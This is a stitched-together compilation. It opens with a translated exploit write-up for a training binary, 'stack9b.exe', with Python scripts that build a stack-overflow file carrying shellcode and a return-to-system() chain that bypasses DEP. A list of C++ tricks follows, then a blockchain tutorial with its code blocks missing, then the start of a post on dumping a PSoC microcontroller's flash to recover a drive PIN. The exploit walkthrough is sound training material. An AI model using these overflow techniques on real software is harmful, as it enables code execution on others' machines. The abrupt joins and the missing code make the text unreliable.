This function has 5 variables, 4 of which are initialized at 0 and one at 32h (“2”), there is a pointer to LoadLibrary that is stored in 0x10103024 then makes a fopen to “fichero.dat” file in binary read mode, stores the FILE pointer in 0x10103020 and finally checks if it exists, if it does not exist it will go to 0x101010d3 and closes (as we saw before) and if it exists it goes to 0x101010e9, let’s look there

function2_opt(1)

Ok, in this procedure it first reads 4 bytes of fichero.dat with fread and stores them in a pointer to a block of memory look 10 (ebp-c), fread returns the total number of elements read and stores it in ebp-8, it does fread of 4 bytes again for the file and stores them in a pointer to ebp-10 then it does it one more time of 1 byte and stores it in a pointer to ebp-1, finally it compares this byte with [ebp-14] which is 32h (“2”) and if it is less than or equal (jle) it goes to 0x10101155 if it doesn’t, show a message saying “Nos fuimos al carajo” (We’re going to fuck off) and it closes.

Then we write in the file 8 bytes + the correct byte (“2”) and we enter 0x10101155, for example:

1234 + 5678 + 2

function3_opt

Well, here it pushes the saved bytes with fread and prints them, allocates 50 bytes (32h) of memory with malloc, stores the pointer to the allocated memory in ebp-1c then push the first 8 bytes of “fichero.dat” to 0x10101010, let’s look over there

function4_opt

Okay, what it does here is it takes the first 4 bytes of fichero.dat and adds them to the following 4 bytes then the result is compared to 58552433h, if the condition is correct, loads “pepe.dll”, then let’s make sure the condition is met (as it is little endian we have to put the bytes at backwards)

As not all characters meet the condition as “0” (30h) +»(» (28h) = 58h (1 byte correct) we do a script that does it and ready

data = "\x21\x1210" + "\x12\x12$(" + "2"
with open("fichero.dat", "w") as file:
	file.write(data)

Okay, this must meet the condition, let’s see.

check58_opt

Well, let’s see what’s it now.

buffer_opt

Once we leave 0x10101010 we see that it reads [ebp-1] bytes of fichero.dat with fread and stores it in a buffer pointing to (ebp-54), Okay, here’s a buffer overflow, let’s analyze it.

First we saw that the ninth byte of “fichero.dat” was stored in [ebp-1], then compared to [ebp-14] (“2”)

anal1_opt(1)

Well, now we see that that byte ([ebp-1]) is used as size of fread that will store that number of bytes (size) in a buffer (ebp-54) of 52 bytes, as the nearest variable is ebp-20, [ebp-54] — [ebp-20] = [ebp-34], so 34h (52d), we can also see it in the IDA stack, right click -> array -> ok

buffer_opt(1)

idastack_opt(1)

Okay, knowing all that, how could we overflow the buffer?

[ebp-1] is the ninth byte of fichero.dat, the size of fread for store in the buffer [ebp-54] and must also be less than or equal to 32h (“2”).

So we know that negative numbers in hexadecimal are higher in decimal, so if we put a negative number in hexadecimal it would allow us to enter more bytes than allowed (52d) and this is because it is signed (jle)

0x10101139 movsx ecx,  byte ptr ss:[ebp-1]
0x1010113d cmp ecx,    dword ptr ss:[ebp-14]
0x10101140 jle         stack9b.10101155

Let’s try to get to the edge of the buffer and at the same time overflowing 2 bytes of the fread stipulation (50 bytes, 32h).

data = "\x21\x1210" + "\x12\x12$(" + "\xff" + "A" * 52

with open("fichero.dat", "w") as file:
	file.write(data)

ff_opt
ffstack_opt

Cool!!! Let’s see what else there is to see if we can control the retn.

Well, now there is a procedure where it copy the buffer bytes [ebp-54] for the block in memory allocated by malloc [ebp-1c]

So, if I fill out [ebp-1c] with “\x41x41x41\x41” he won’t be able to write because it’s not a valid address, let’s find one that is.

ywrite_opt

All right, let’s check the stack, see how many bytes it takes to get to the start of retn and control it.

88b_opt

Okay, let’s set up our exploit

import subprocess

shellcode ="\xB8\x40\x50\x03\x78\xC7\x40\x04"+ "calc" + "\x83\xC0\x04\x50\x68\x24\x98\x01\x78\x59\xFF\xD1"

buff = "\x41" * 52
ebp_20 = "\x41" * 4
ebp_1c = "\x30\x30\x10\x10"    # Address with write permission
ebp_18 = "\x41" * 4
ebp_14 = "\x41" * 4
ebp_10 = "\x41" * 4
ebp_c = "\x41" * 4
ebp_8 = "\x41" * 4
ebp_4 = "\x41" * 4
s = "\x41" * 4    # ebp
r = shellcode


data = "\x21\x1210" + "\x12\x12$(" + "\xff" + buff + ebp_20 + ebp_1c + ebp_18 + ebp_14 + ebp_10 + ebp_c + ebp_8 + ebp_4 + s + r

with open("fichero.dat", "w") as file:
	file.write(data)

subprocess.call(r"stack9b.exe")

Well, we already have EIP under control but now it doesn’t allow me to execute my shellcode, this is due to DEP (data execution prevention).

Summarizing up, DEP changes the permissions of the segments where data is stored to prevent us from executing code there -ricnar

So to bypass the DEP we can do ROP (return oriented programming) which is basically using gadgets that are program’s executable code to change the stack permissions with some api like VirtualProtect or VirtualAlloc

Looking for gadgets in pepe.dll I couldn’t find VirtualAlloc, but there is a pointer to system() , would only be missing a return that can be exit() and a fixed place that we can control to pass it a string to system()

system_opt(1)
exit_opt

Now only the string for system() would be missing, we can use the address with write permission

calc_opt(1)

Here I set up the stack because malloc only assigned 50 bytes and then had no control over the eip and that’s how the exploit would look.

import subprocess

system = "\x24\x98\x01\x78"    # system()
calc = "calc.exe"

buff = "\x41" * 42
#ebp_20 = "\x41" * 4
ebp_1c = "\x30\x30\x10\x10"    # Address with write permission
ebp_18 = "\x41" * 4
ebp_14 = "\x41" * 4
ebp_10 = "\x41" * 4
ebp_c = "\x41" * 4
ebp_8 = "\x41" * 4
ebp_4 = "\x41" * 4
s = "\x41" * 4    # ebp
r = system
exit = "\x78\x1d\x10\x10"    # exit()
ptr_calc = "\x5a\x30\x10\x10"



data = "\x21\x1210" + "\x12\x12$(" + "\xff" + buff + calc + "\x41" * 6 +  ebp_1c + ebp_18 + ebp_14 + ebp_10 + ebp_c + ebp_8 + ebp_4 + s + r + exit + ptr_calc

with open("fichero.dat", "w") as file:
	file.write(data)

subprocess.call(r"stack9b.exe")

What are some fun C++ tricks

This one applies to all languages so far:

a=a+b-(b=a);

A REALLY fast way of swaping a and b.

#include <iostream>
#include <string>

using namespace std;

int main (int argc, char*argv) {
float a; cout << «A:»; cin >> a;
float b; cout << «B:» ; cin >> b;

cout << «———————» << endl;
cout << «A=» << a << «, B=» << b << endl;
a=a+b-(b=a);
cout << «A=» << a << «, B=» << b << endl;
exit(0);
}


void Send(int * to, const int* from, const int count)

{

   int n = (count+7) / 8;

   switch(count%8)

   {

      case 0:

         do

            {

               *to++ = *from++;

      case 7:

               *to++ = *from++;

      case 6:

               *to++ = *from++;

      case 5:

               *to++ = *from++;

      case 4:

               *to++ = *from++;

      case 3:

               *to++ = *from++;

      case 2:

               *to++ = *from++;

      case 1:

               *to++ = *from++;

              } while (—n>0);

    }

}


Preprocessor Tricks

The arraysize macro used in Chrome’s source:

  1. template <typename T, size_t N>
  2. char (&ArraySizeHelper(T (&array)[N]))[N];
  3. #define arraysize(array) (sizeof(ArraySizeHelper(array)))

This is better than the ordinary sizeof(array)/sizeof(array[0]) because it raises compilation errors when the passed in array is just a pointer, or a null pointer whereas the simpler macro silently returns a useless value. For a detailed example, see PVS-Studio vs Chromium.

Predefined Macros:

  1. #define expect(expr) if(!expr) cerr << «Assertion « << #expr \
  2. » failed at « << __FILE__ << «:» << __LINE__ << endl;
  3. #define stringify(x) #x
  4. #define tostring(x) stringify(x)
  5. #define MAGIC_CONSTANT 314159
  6. cout << «Value of MAGIC_CONSTANT=» << tostring(MAGIC_CONSTANT);

The tostring macro is a common trick used to expand macro values inside other macros. The Linux kernel uses a lot of macro tricks.

Using iterators for quickly dumping the contents of a container:

  1. #define dbg(v) copy(v.begin(), v.end(), ostream_iterator<typeof(*v.begin())>(cout, » «))

Sadly, this doesn’t work for pair types so maps are out of scope.

Template Voodoo

Recursion:You can specialize your class templates for certain cases, so you can write down the base-case of a recursion and then define the generic template as a recursive combination of base cases.
For example, the following code calculates the values of the Choose function at compile time:

  1. template<unsigned n, unsigned r>
  2. struct Choose {
  3. enum {value = (n * Choose<n1, r1>::value) / r};
  4. };
  5. template<unsigned n>
  6. struct Choose<n, 0> {
  7. enum {value = 1};
  8. };
  9. int main() {
  10. // Prints 56
  11. cout << Choose<8, 3>::value;
  12. // Compile time values can be used as array sizes
  13. int x[Choose<25, 3>::value];
  14. }

More interesting examples at C++ Programming/Templates/Template Meta-Programming

Mostly Painless Memory Management and RAII

With certain restrictions, you can create templates for «smart» pointers that automatically deallocate resources when they go out of scope or reference count goes to 0. This is basically done by overloading operator * and operator =. Based on your use case, you can transfer ownership when the operator = is used, or update reference counts.
See Smart Pointer Guidelines — The Chromium Projects and http://code.google.com/searchfra…

Argument-dependent name lookup aka Koenig lookup

When a function call cannot be matched to a name in the current namespace, other namespaces can be searched for a matching signature. This is why std::cout << "Hi"; works even though operator << is defined in the stdnamespace.
See Argument-dependent name lookup


auto keyword
In C++ you can use auto to iterate over map,vector,set,..etc which specifies that the type of the variable that is being declared will be automatically deduced from its initializer or for functions it will the return type or it will be deduced from its return statements
So instead of :

  1. vector<int> vs;
  2. vs.push_back(4),vs.push_back(7),vs.push_back(9),vs.push_back(10);
  3. for (vector<int>::iterator it = vs.begin(); it != vs.end(); ++it)
  4. cout << *it << ‘ ‘;cout<<‘\n’;

just use :

  1. vector<int> vs;
  2. vs.push_back(4),vs.push_back(7),vs.push_back(9),vs.push_back(10);
  3. for (auto it: vs)
  4. cout << it << ‘ ‘;cout<<endl;
  5. //you can also change the values using
  6. vector<int> vs;
  7. vs.push_back(4),vs.push_back(7),vs.push_back(9),vs.push_back(10);
  8. for (auto& it: vs) it*=3;
  9. for (auto it: vs)
  10. cout << it << ‘ ‘;cout<<endl;

Declaring variable

  1. template<class A, class B>
  2. auto mult(A x, B y) -> decltype(x * y){
  3. return x * y;
  4. }
  5. int main(){
  6. auto a = 3 * 2; //the return type is the type of operator (x*y)
  7. cout<<a<<endl;
  8. return 0;
  9. }

The Power of Strings 

  1. int n,m;
  2. cin >> n >> m;
  3. int matrix[n+1][m+1];
  4. //This loop
  5. for(int i = 1; i <= n; i++) {
  6. for(int j = 1; j <= m; j++)
  7. cout << matrix[i][j] << » «;
  8. cout << «\n»;
  9. }
  10. // is equivalent to this
  11. for(int i = 1; i <= n; i++)
  12. for(int j = 1; j <= m; j++)
  13. cout << matrix[i][j] << » \n»[j == m];

because " \n" is a char*," \n"[0] is ' ' and " \n"[1] is '\n'  .

Some Hidden function
__gcd(x, y)
you don’t need to code gcd function.

  1. cout<<__gcd(54,48)<<endl; //return 6

__builtin_ffs(x)
This function returns 1 + least significant 1-bit of x. If x == 0, returns 0. Here x is int, this function with suffix ‘l’ gets a long argument and with suffix ‘ll’ gets a long long argument.
e.g:  __builtin_ffs(10) = 2 because 10 is ‘…10 1 0′ in base 2 and first 1-bit from right is at index 1 (0-based) and function returns 1 + index.three)

Pairing tricks 

  1. pair<int, int> p;
  2. //This
  3. p = make_pair(1, 2);
  4. //equivalent to this
  5. p = {1, 2};
  6. //So
  7. pair<int, pair<char, long long> > p;
  8. //now easier
  9. p = {1, {‘a’, 2ll}};

Super include 
Simply use
#include <bits/stdc++.h>
This library includes many of libraries we do need  like algorithm, iostream, vector and many more. Believe me you don’t need to include anything else 😀 !!

Smart Pointers

Using smart pointers, we can make pointers to work in way that we don’t need to explicitly call delete. Smart pointer is a wrapper class over a pointer with operator like * and -> overloaded. The objects of smart pointer class look like pointer, but can do many things that a normal pointer can’t like automatic destruction (yes, we don’t have to explicitly use delete), reference counting and more.
The idea is to make a class with a pointer, destructor and overloaded operators like * and ->. Since destructor is automatically called when an object goes out of scope, the dynamically alloicated memory would automatically deleted (or reference count can be decremented).


You can put URIs in your C++ code and the compiler will not throw any error.

  1. #include <iostream>
  2. int main() {
  3. using namespace std;
  4. http://www.google.com
  5. int x = 5;
  6. cout << x;
  7. }

Explanation: Any identifier followed by a : becomes a (goto) label in C++. Anything followed by // becomes a comment so in the code above, http is a label and //google.com/is a comment. The compiler might throw a warning however, since the label is unutilized.


Don’t Confuse Assign (=) with Test-for-Equality (==).

This one is elementary, although it might have baffled Sherlock Holmes. The following looks innocent and would compile and run just fine if C++ were more like BASIC:

if (a = b)
cout << «a is equal to b.»;

Because this looks so innocent, it creates logic errors requiring hours to track down within a large program unless you’re on the lookout for it. (So when a program requires debugging, this is the first thing I look for.) In C and C++, the following is not a test for equality:

a = b

What this does, of course, is assign the value of b to a and then evaluate to the value assigned.
The problem is that a = b does not generally evaluate to a reasonable true/false condition—with one major exception I’ll mention later. But in C and C++, any numeric value can be used as a condition for “if” or “while.
Assume that a and b are set to 0. The effect of the previously-shown if statement is to place the value of b into a; then the expression a = b evaluates to 0. The value 0 equates to false. Consequently, aand b are equal, but exactly the wrong thing gets printed:

if (a = b)     // THIS ENSURES a AND b ARE EQUAL…
cout << «a and b are equal.»;
else
cout << «a and b are not equal.»;  // BUT THIS GETS PRINTED!

The solution, of course, is to use test-for-equality when that’s what you want. Note the use of double equal signs (==). This is correct inside a condition.

// CORRECT VERSION:
if (a == b)
cout << «a and b are equal.»;


The most amazing trick i found was a status of someone’s topcoder profile:
Code:
#include <cstdio>
double m[]= {7709179928849219.0, 771};
int main()
{
m[1]—?m[0]*=2,main():printf((char*)m);
}
You will be seriously amazed by the ouput…here it is:
C++Sucks

I tried to analyse the code and came up with a reason but not an exact explanation..so i tried to ask it on stackoverflow..you can go through the explanation here:
Concept behind this 4 lines tricky C++ code
Read it and you will learn something you wouldn’t have even thought of… 😉


  1. static const unsigned char BitsSetTable256[256] =
  2. {
  3. # define B2(n) n, n+1, n+1, n+2
  4. # define B4(n) B2(n), B2(n+1), B2(n+1), B2(n+2)
  5. # define B6(n) B4(n), B4(n+1), B4(n+1), B4(n+2)
  6. B6(0), B6(1), B6(1), B6(2)
  7. };
  8. unsigned int v; // count the number of bits set in 32-bit value v
  9. unsigned int c; // c is the total bits set in v
  10. // Option 1:
  11. c = BitsSetTable256[v & 0xff] +
  12. BitsSetTable256[(v >> 8) & 0xff] +
  13. BitsSetTable256[(v >> 16) & 0xff] +
  14. BitsSetTable256[v >> 24];
  15. // Option 2:
  16. unsigned char * p = (unsigned char *) &v;
  17. c = BitsSetTable256[p[0]] +
  18. BitsSetTable256[p[1]] +
  19. BitsSetTable256[p[2]] +
  20. BitsSetTable256[p[3]];
  21. // To initially generate the table algorithmically:
  22. BitsSetTable256[0] = 0;
  23. for (int i = 0; i < 256; i++)
  24. {
  25. BitsSetTable256[i] = (i & 1) + BitsSetTable256[i / 2];
  26. }

 

 

  1. float Q_rsqrt( float number )
  2. {
  3. long i;
  4. float x2, y;
  5. const float threehalfs = 1.5F;
  6. x2 = number * 0.5F;
  7. y = number;
  8. i = * ( long * ) &y; // evil floating point bit level hacking
  9. i = 0x5f3759df - ( i >> 1 ); // what the fuck?
  10. y = * ( float * ) &i;
  11. y = y * ( threehalfs - ( x2 * y * y ) ); // 1st iteration
  12. // y = y * ( threehalfs - ( x2 * y * y ) ); // 2nd iteration, this can be removed
  13. return y;
  14. }

Iteration: 

  1. #define FOR(i,n) for(int (i)=0;(i)<(n);(i)++)
  2. #define FORR(i,a,b) for(int (i)=(a);(i)<(b);(i)++)
  3. //reverse
  4. #define REV(i,n) for(int (i)=(n)-1;(i)>=0;(i)--)

Handy way to use it like this. 

  1. typedef long long int int64;
  2. typedef unsigned long long int uint64;

FastIO for +ve integers.

    1. inline void frint(int *a){
    2. register char c=0;while (c<33) c=getchar_unlocked();*a=0;
    3. while (c>33){*a=*a*10+c-'0';c=getchar_unlocked();}
    4. }

Try This….

#include <iostream>
using namespace std;
int main()
{
int a,b,c;
int count = 1;
for (b=c=10;a=»- FIGURE?, UMKC,XYZHello Folks,\
TFy!QJu ROo TNn(ROo)SLq SLq ULo+\
UHs UJq TNn*RPn/QPbEWS_JSWQAIJO^\
NBELPeHBFHT}TnALVlBLOFAkHFOuFETp\
HCStHAUFAgcEAelclcn^r^r\\tZvYxXy\
T|S~Pn SPm SOn TNn ULo0ULo#ULo-W\
Hq!WFs XDt!» [b+++21]; )
for(; a— > 64 ; )
putchar ( ++c==’Z’ ? c = c/ 9:33^b&1);
return 0;
}


I think one of the coolest of all time, is defining an abstract base class in C++, and inheriting from it in python, and passing it back to C++ to call.
It actually works

  1. struct Interface{
  2. int foo()const=0;
  3. virtual ~Interface(){}
  4. };
  5. void call(Interface const& f){
  6. std::cout<<f.foo()<<std::endl;
  7. }
  8. struct InterfaceWrap final: Interface, boost::python::wrapper<Interface>
  9. {
  10. int foo() const final
  11. {
  12. return this->get_override("foo")();
  13. }
  14. };
  15. BOOST_PYTHON_MODULE(interface){
  16. using namespace boost::python;
  17. class_<Interface ,boost ::noncopyable,boost::shared_ptr<Interface>>("_InterfaceCpp",no_init)
  18. .def("foo",&Interface::foo)
  19. ;
  20. class_<InterfaceWrap ,bases<Interface>,boost::shared_ptr<InterfaceWrap>>("Interface",init<>())
  21. ;
  22. def("call",&call);
  23. }

and then

  1. import interface as i # C++ code
  2. class impl(i.Interface):#inherit from C++ class
  3. def __init__(self):
  4. i.Interface.__init__(self)
  5. def foo(self):
  6. return 100
  7. i.call(impl())#call C++ function with Python derived class

This does exactly what you think it should do.


void qsort ( void * base, size_t num, size_t size, int ( * compar ) ( const void *, const void * ) )

base Pointer to the first element of the array to be sorted.

num Number of elements in the array pointed by base. size_t is an unsigned integral type.

size Size in bytes of each element in the array. size_t is an unsigned integral type.

compar Function that compares two elements. This function is called repeatedly by qsorttocomparetwoelements.It shall follow the following prototype:

int compar ( const void * elem1, const void * elem2 );

Taking a pointer to two pointers as arguments (both type-casted to const void*). The function should compare the data pointed by both: if they match in ranking, the function shall return zero; if elem1 goes before elem2, it shall return a negative value; and if it goes after, a positive value.

Eg :

int values[] = { 40, 10, 100, 90, 20, 25 };

int compare (const void * a, const void * b) { return ( *(int*)a — *(int*)b ); }

int main () {
int n;
qsort (values, 6, sizeof(int), compare);
for (n=0; n<6; n++) printf («%d «,values[n]); return 0; }


Partial template specialization

C++11 has this cool function get<J> which can be used to access the first and second member of a pair, with a different syntax:

  1. std::pair < std::string, double > pr ( «pi», 3.14 );
  2. std::cout << std::get < 0 > ( pr ); // outputs «pi»
  3. std::cout << std::get < 1 > ( pr ); // outputs 3.14

Note that this is a function and not a function object or a member function.

I do not find it trivial to write a function

  • with three template types template < size_t J, class T1, class T2 >
  • which can get std::pair < T1, T2 > as an argument
  • and outputs pr.first if the template value J is 0
  • and outputs pr.second if the template value J is 1.

In particular consider that in C++ one cannot overload a function based on its return type. So what should the return type of this function be declared as? T1 or T2?

  1. template < size_t J, class T1, class T2>
  2. ??? get ( std::pair < T1, T2 > & );

The interesting thing is that one could already write this function in C++98 using Partial template specialization, which is a really cool trick. The problem is that function templates cannot be partially specialized, but this is easy to solve:

  1. namespace
  2. {
  3. /*!
  4. * helper template to do the work with partial specialization
  5. */
  6. template < size_t J, class T1, class T2 >
  7. struct Get;
  8. template < class T1, class T2>
  9. struct Get < 0, T1, T2 >
  10. {
  11. typedef typename std::pair < T1, T2 >::first_type result_type;
  12. static result_type & elm ( std::pair < T1, T2 > & pr ) { return pr.first; }
  13. static const result_type & elm ( const std::pair < T1, T2 > & pr ) { return pr.first; }
  14. };
  15. template < class T1, class T2>
  16. struct Get < 1, T1, T2 >
  17. {
  18. typedef typename std::pair < T1, T2 >::second_type result_type;
  19. static result_type & elm ( std::pair < T1, T2 > & pr ) { return pr.second; }
  20. static const result_type & elm ( const std::pair < T1, T2 > & pr ) { return pr.second; }
  21. };
  22. }
  23. template < size_t J, class T1, class T2 >
  24. typename Get< J, T1, T2 >::result_type & get ( std::pair< T1, T2 > & pr )
  25. {
  26. return Get < J, T1, T2 >::elm( pr );
  27. }
  28. template < size_t J, class T1, class T2 >
  29. const typename Get< J, T1, T2 >::result_type & get ( const std::pair< T1, T2 > & pr )
  30. {
  31. return Get < J, T1, T2 >::elm( pr );
  32. }

Define operator<< for STL structures to make it easy to add debug outputs to your code. (This is better than special printing functions because it nests automatically! Printing a map< vector<int>, int> works without any additional effort if you can print any map and any vector.)

Additionally, define a macro that makes nicer debug outputs and makes it easy to turn them off using the standard mechanism (same one that is used for assert). Here’s a short example how to do all of this in C++11:

  1. #include <iostream>
  2. #include <string>
  3. #include <map>
  4. #ifdef NDEBUG
  5. #define DEBUG(var)
  6. #else
  7. #define DEBUG(var) { std::cout << #var << ": " << (var) << std::endl; }
  8. #endif
  9. template<typename T1, typename T2>
  10. std::ostream& operator<< (std::ostream& out, const std::map<T1,T2> &M) {
  11. out << "{ ";
  12. for (auto item:M) out << item.first << "->" << item.second << ", ";
  13. out << "}";
  14. return out;
  15. }
  16. int main() {
  17. std::map<std::string,int> age = { {"Joe",47}, {"Bob",22}, {"Laura",19} };
  18. DEBUG(age);
  19. }

This is a very amazing piece of code:

main(a){printf(a,34,a=»main(a){printf(a,34,a=%c%s%c,34);}»,34);}

It is the shortest C++ code which when executed prints itself. It was discovered by Vlad Taeerov and Rashit Fakhreyev and is only 64 characters in length(Making it the shortest).


To Convert list<T> to vector<T>:

  1. std::vector<T> v(l.begin(), l.end());

 

Variadic Templates :

They can be useful in places. You can pass any number of parameters .
Example  :

  1. #include <iostream>
  2. #include <bitset>
  3. #include <string>
  4. using namespace std;
  5.  
  6. void print() {
  7. cout<<«Nothing to print :)» ;
  8. }
  9.  
  10. template<typename T,typename args>
  11. void print(T x,args y) {
  12. cout<<x<<endl;
  13. print(y…);
  14. }
  15.  
  16. int main() {
  17. print(10,14.56,«Quora»,bitset<20>(28));
  18. return 0;
  19. }

 

Code on ideon : http://ideone.com/b8TNHD

Output :

  1. 10
  2. 14.56
  3. Quora
  4. 00000000000000011100
  5. Nothing to print 🙂

 

Range based for loops can be used with some STL containers :
eg.

 

  1. #include <iostream>
  2. #include <list>
  3. #include <vector>
  4.  
  5. using namespace std;
  6.  
  7. int main() {
  8. list<int> x;
  9. x.push_back(10);
  10. x.push_back(20);
  11. for(auto i : x)
  12. cout<<i;
  13. return 0;
  14. }

Build a blockchain with C++

So, you might have heard a lot about something called a blockchain lately and wondered what all the fuss is about. A blockchain is a ledger which has been written in such a way that updating the data contained within it becomes very difficult, some say the blockchain is immutable and to all intents and purposes they’re right but immutability suggests permanence and nothing on a hard drive could ever be considered permanent. Anyway, we’ll leave the philosophical debate to the non-techies; you’re looking for someone to show you how to write a blockchain in C++, so that’s exactly what I’m going to do.

Before I go any further, I have a couple of disclaimers:

  1. This tutorial is based on one written by Savjee using NodeJS; and
  2. It’s been a while since I wrote any C++ code, so I might be a little rusty.

The first thing you’ll want to do is open a new C++ project, I’m using CLion from JetBrains but any C++ IDE or even a text editor will do. For the interests of this tutorial we’ll call the project TestChain, so go ahead and create the project and we’ll get started.

If you’re using CLion you’ll see that the main.cpp file will have already been created and opened for you; we’ll leave this to one side for the time being.

Create a file called Block.h in the main project folder, you should be able to do this by right-clicking on the TestChain directory in the Project Tool Window and selecting: New > C/C++ Header File.

Inside the file, add the following code (if you’re using CLion place all code between the lines that read #define TESTCHAIN_BLOCK_H and #endif):

These lines above tell the compiler to include the cstdint, and iostream libraries.

Add this line below it:

This essentially creates a shortcut to the std namespace, which means that we don’t need to refer to declarations inside the stdnamespace by their full names e.g. std::string, but instead use their shortened names e.g. string.

So far, so good; let’s start fleshing things out a little more.

A blockchain is made up of a series of blocks which contain data and each block contains a cryptographic representation of the previous block, which means that it becomes very hard to change the contents of any block without then needing to change every subsequent one; hence where the blockchain essentially gets its immutable properties.

So let’s create our block class, add the following lines to the Block.h header file:

Unsurprisingly, we’re calling our class Block (line 1) followed by the public modifier (line 2) and public variable sPrevHash(remember each block is linked to the previous block) (line 3). The constructor signature (line 5) takes three parameters for nIndexIn, and sDataIn; note that the const keyword is used along with the reference modifier (&) so that the parameters are passed by reference but cannot be changed, this is done to improve efficiency and save memory. The GetHash method signature is specified next (line 7) followed by the MineBlock method signature (line 9), which takes a parameter nDifficulty. We specify the private modifier (line 11) followed by the private variables _nIndex, _nNonce, _sData, _sHash, and _tTime (lines 12–16). The signature for _CalculateHash (line 18) also has the const keyword, this is to ensure the output from the method cannot be changed which is very useful when dealing with a blockchain.

Now it’s time to create our Blockchain.h header file in the main project folder.

Let’s start by adding these lines (if you’re using CLion place all code between the lines that read #define TESTCHAIN_BLOCKCHAIN_H and #endif):

They tell the compiler to include the cstdint, and vector libraries, as well as the Block.h header file we have just created, and creates a shortcut to the std namespace.

Now let’s create our blockchain class, add the following lines to the Blockchain.h header file:

As with our block class, we’re keeping things simple and calling our blockchain class Blockchain (line 1) followed by the publicmodifier (line 2) and the constructor signature (line 3). The AddBlock signature (line 5) takes a parameter bNew which must be an object of the Block class we created earlier. We then specify the private modifier (line 7) followed by the private variables for _nDifficulty, and _vChain (lines 8–9) as well as the method signature for _GetLastBlock (line 11) which is also followed by the const keyword to denote that the output of the method cannot be changed.

Ain't nobody got time for that!Since blockchains use cryptography, now would be a good time to get some cryptographic functionality in our blockchain. We’re going to be using the SHA256 hashing technique to create hashes of our blocks, we could write our own but really – in this day and age of open source software – why bother?

To make my life that much easier, I copied and pasted the text for the sha256.h, sha256.cpp and LICENSE.txt files shown on the C++ sha256 function from Zedwood and saved them in the project folder.

Right, let’s keep going.

Create a source file for our block and save it as Block.cpp in the main project folder; you should be able to do this by right-clicking on the TestChain directory in the Project Tool Window and selecting: New > C/C++ Source File.

Start by adding these lines, which tell the compiler to include the Block.h and sha256.h files we added earlier.

Follow these with the implementation of our block constructor:

The constructor starts off by repeating the signature we specified in the Block.h header file (line 1) but we also add code to copy the contents of the parameters into the the variables _nIndex, and _sData. The _nNonce variable is set to -1 (line 2) and the _tTime variable is set to the current time (line 3).

Let’s add an accessor for the block’s hash:

We specify the signature for GetHash (line 1) and then add a return for the private variable _sHash (line 2).

As you might have read, blockchain technology was made popular when it was devised for the Bitcoin digital currency, as the ledger is both immutable and public; which means that, as one user transfers Bitcoin to another user, a transaction for the transfer is written into a block on the blockchain by nodes on the Bitcoin network. A node is another computer which is running the Bitcoin software and, since the network is peer-to-peer, it could be anyone around the world; this process is called ‘mining’ as the owner of the node is rewarded with Bitcoin each time they successfully create a valid block on the blockchain.

To successfully create a valid block, and therefore be rewarded, a miner must create a cryptographic hash of the block they want to add to the blockchain that matches the requirements for a valid hash at that time; this is achieved by counting the number of zeros at the beginning of the hash, if the number of zeros is equal to or greater than the difficulty level set by the network that block is valid. If the hash is not valid a variable called a nonce is incremented and the hash created again; this process, called Proof of Work (PoW), is repeated until a hash is produced that is valid.

So, with that being said, let’s add the MineBlock method; here’s where the magic happens!

We start with the signature for the MineBlock method, which we specified in the Block.h header file (line 1), and create an array of characters with a length one greater that the value specified for nDifficulty (line 2). A for loop is used to fill the array with zeros, followed by the final array item being given the string terminator character (\0), (lines 3–6) then the character array or c-string is turned into a standard string (line 8). A do…while loop is then used (lines 10–13) to increment the _nNonce and _sHashis assigned with the output of _CalculateHash, the front portion of the hash is then compared the string of zeros we’ve just created; if no match is found the loop is repeated until a match is found. Once a match is found a message is sent to the output buffer to say that the block has been successfully mined (line 15).

We’ve seen it mentioned a few times before, so let’s now add the _CalculateHash method:

We kick off with the signature for the _CalculateHash method (line 1), which we specified in the Block.h header file, but we include the inline keyword which makes the code more efficient as the compiler places the method’s instructions inline wherever the method is called; this cuts down on separate method calls. A string stream is then created (line 2), followed by appending the values for _nIndex, _tTime, _sData, _nNonce, and sPrevHash to the stream (line 3). We finish off by returning the output of the sha256 method (from the sha256 files we added earlier) using the string output from the string stream (line 5).

Right, let’s finish off our blockchain implementation! Same as before, create a source file for our blockchain and save it as Blockchain.cpp in the main project folder.

Add these lines, which tell the compiler to include the Blockchain.h file we added earlier.

Follow these with the implementation of our blockchain constructor:

We start off with the signature for the blockchain constructor we specified in Blockchain.h (line 1). As a blocks are added to the blockchain they need to reference the previous block using its hash, but as the blockchain must start somewhere we have to create a block for the next block to reference, we call this a genesis block. A genesis block is created and placed onto the _vChain vector (line 2). We then set the _nDifficulty level (line 3) depending on how hard we want to make the PoW process.

Now it’s time to add the code for adding a block to the blockchain, add the following lines:

The signature we specified in Blockchain.h for AddBlock is added (line 1) followed by setting the sPrevHash variable for the new block from the hash of the last block on the blockchain which we get using _GetLastBlock and its GetHash method (line 2). The block is then mined using the MineBlock method (line 3) followed by the block being added to the _vChain vector (line 4), thus completing the process of adding a block to the blockchain.

Let’s finish this file off by adding the last method:

We add the signature for _GetLastBlock from Blockchain.h (line 1) followed by returning the last block found in the _vChainvector using its back method (line 2).

Right, that’s almost it, let’s test it out!

Remember the main.cpp file? Now’s the time to update it, open it up and replace the contents with the following lines:

This tells the compiler to include the Blockchain.h file we created earlier.

Then add the following lines:

As with most C/C++ programs, everything is kicked off by calling the main method, this one creates a new blockchain (line 2) and informs the user that a block is being mined by printing to the output buffer (line 4) then creates a new block and adds it to the chain (line 5); the process for mining that block will then kick off until a valid hash is found. Once the block is mined the process is repeated for two more blocks.

Time to run it! If you are using CLion simply hit the ‘Run TestChain’ button in the top right hand corner of the window. If you’re old skool, you can compile and run the program using the following commands from the command line:

If all goes well you should see an output like this:

Congratulations, you have just written a blockchain from scratch in C++, in case you got lost I’ve put all the files into a Github repo. Since the original code for Bitcoin was also written in C++, why not take a look at its code and see what improvements you can make to what we’ve started off today?

Orig post

Aigo Chinese encrypted HDD − Part 2: Dumping the Cypress PSoC 1

Original post by Raphaël Rigo on syscall.eu ( under CC-BY-SA 4.0 )

TL;DR

I dumped a Cypress PSoC 1 (CY8C21434) flash memory, bypassing the protection, by doing a cold-boot stepping attack, after reversing the undocumented details of the in-system serial programming protocol (ISSP).

It allows me to dump the PIN of the hard-drive from part 1 directly:

$ ./psoc.py 
syncing:  KO  OK
[...]
PIN:  1 2 3 4 5 6 7 8 9  

Code:

Introduction

So, as we have seen in part 1, the Cypress PSoC 1 CY8C21434 microcontroller seems like a good target, as it may contain the PIN itself. And anyway, I could not find any public attack code, so I wanted to take a look at it.

Our goal is to read its internal flash memory and so, the steps we have to cover here are to:

  • manage to “talk” to the microcontroller
  • find a way to check if it is protected against external reads (most probably)
  • find a way to bypass the protection

There are 2 places where we can look for the valid PIN:

  • the internal flash memory
